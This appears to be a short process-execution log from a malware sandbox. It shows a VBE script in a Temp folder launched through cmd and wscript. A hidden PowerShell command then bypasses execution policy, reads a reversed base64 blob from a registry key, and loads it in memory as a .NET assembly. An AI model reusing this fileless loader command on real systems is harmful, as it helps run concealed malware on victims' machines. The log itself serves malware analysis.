cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "DqbQpcSbz" C:\Users\test22\AppData\Local\Temp\goodthingsgreat.vbe
2544wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\goodthingsgreat.vbe"
2656powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\lQjVXhrhvUviokM' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [x.x]::x('lQjVXhrhvUviokM')
2816